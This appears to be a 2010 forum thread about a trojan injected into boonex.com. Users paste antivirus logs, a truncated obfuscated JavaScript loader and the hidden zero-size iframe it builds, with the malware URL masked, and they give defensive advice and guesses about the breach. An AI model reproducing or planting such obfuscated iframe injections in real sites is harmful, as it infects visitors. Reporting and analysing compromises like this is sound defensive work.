Avast Antivirus has just alerted me to three instances of Trojan Horse at www.boonex.com front page. This is a javascript/iframe/java based exploit placed somewhere into Boonex.com code or templates.
Someone should investigate this immediately. If it's a false positive, it should be reported to Avast for the next virus definition update. (Update: This is a confirmed iframe/trojan exploit, see comments for detail.) If someone else receives an alert, please look at the logs and report the URLs of the affected pages, along with your virus software brand.
Until this is resolved, suggest turning javascript off in your browser, or otherwise being double sure your virus protection and browser choice are up to standard. The exploit itself depends on a Java applet, so turning Java off at boonex.com is a good idea too.
So far Unity seems to be unaffected, while several other areas cause the alerts below.
Avast Report:
16.5.2010 22:59:44 http://www.boonex.com/ [L] HTML:IFrame-NO [Trj] (0)
16.5.2010 22:59:48 http://www.boonex.com/livehelp/include/javascript.php [L] HTML:IFrame-NO [Trj] (0)
16.5.2010 22:59:53 http://www.boonex.com/livehelp/locale/en/images/InitateChat.png [L] HTML:IFrame-NO [Trj] (0)
While the last two are reported, the files themselves don't seem to exist. The only infection I can see is the obfuscated javascript at the bottom of the HTML, creating an iframe that links to a malware server.
Screenshots:
<!-- stardevelop.com Live Help International Copyright - All Rights Reserved //-->
<!-- BEGIN stardevelop.com Live Help Messenger Code - Copyright - NOT PERMITTED TO MODIFY IMAGE MAP/CODE/LINKS //-->
<script language="JavaScript" type="text/JavaScript" src="http://www.boonex.com/livehelp/include/javascript.php"></script>
<!-- END stardevelop.com Live Help see more
Since no malware has ever been written for the BeOS, I'm safe from all forms of threats. Ha ha.
<!-- stardevelop.com Live Help International Copyright - All Rights Reserved //-->
<!-- BEGIN stardevelop.com Live Help Messenger Code - Copyright - NOT PERMITTED TO MODIFY IMAGE MAP/CODE/LINKS //-->
<div id="floatLayer" align="left" style="position:absolute; left:10px; top:10px; visibility:hidden; z-index:5000;">
<map see more
<script language=JavaScript>
var uwdblfsaodg = 'sYLYnyre3csYLYnyre69sYLYnyre66';var welvbvsnxdg = 'sYLYnyre72';var vmxygonhnmd = 'sYLYnyre61sYLYnyre6dsYLYnyre65sYLYnyre20sYLYnyre6esYLYnyre61sYLYnyre6dsYLYnyre65sYLYnyre3dsYLYnyre22';var poowgoljvco = 'sYLYnyre75sYLYnyre6fsYLYnyre75sYLYnyre6esYLYnyre61sYLYnyre71sYLYnyre70sYLYnyre67sYLYnyre77sYLYnyre68sYLYnyre77';var qxqcqdatksf = 'sYLYnyre22sYLYnyre20sYLYnyre77sYLYnyre69sYLYnyre64sYLYnyre74sYLYnyre68sYLYnyre3dsYLYnyre22sYLYnyre31sYLYnyre22sYLYnyre20sYLYnyre68sYLYnyre65sYLYnyre69sYLYnyre67sYLYnyre68sYLYnyre74sYLYnyre3dsYLYnyre22sYLYnyre30sYLYnyre22';var see more
http://www.codesatori.com/test/boonex_source.php
And here's an archived version where you can look up the javascript after it (hopefully) gets removed:
http://www.codesatori.com/test/boonex_source.html
<iframe name="uounaqpgwhw" width="1" height="0" src="http://********************" marginwidth="1" marginheight="0" title="uounaqpgwhw" scrolling="no" border="0" frameborder="0"></iframe>
So it's a classic iframe insertion hack there. Now let's patch up those systems!
The URL in the script currently see more
You can see that /phixnew/index.php at the above URL contains some sort of Java applet based exploit, while another URL under the same path is an ActiveX based trojan.
And BeOS is like a cabin in the woods.... No crime to worry about, but then again not much else either. It's very safe however! =)
we have a different plan .. to not allow anyone to control you :)
I like to think this was an automated exploit, but given that it rolled in on Sunday (which is when staff is rarely around here), and given that this site runs on proprietary software, it may also be a targeted exploit attempt.
AlexT, good job in getting it removed. So was there a patch you had to implment, and if so which i would think there was, when are you going to release that patch so that the thousands of sites that are running this platform can utilize that security patch?
Regards,
DosDawg
My educated guess is that either 1) someone was able to modify Boonex.com templates due to a public vulnerability in a template/templating file (which is the better case), or 2) someone gained administrator level access to the site and did it (which is the worse case). In either case, it would see more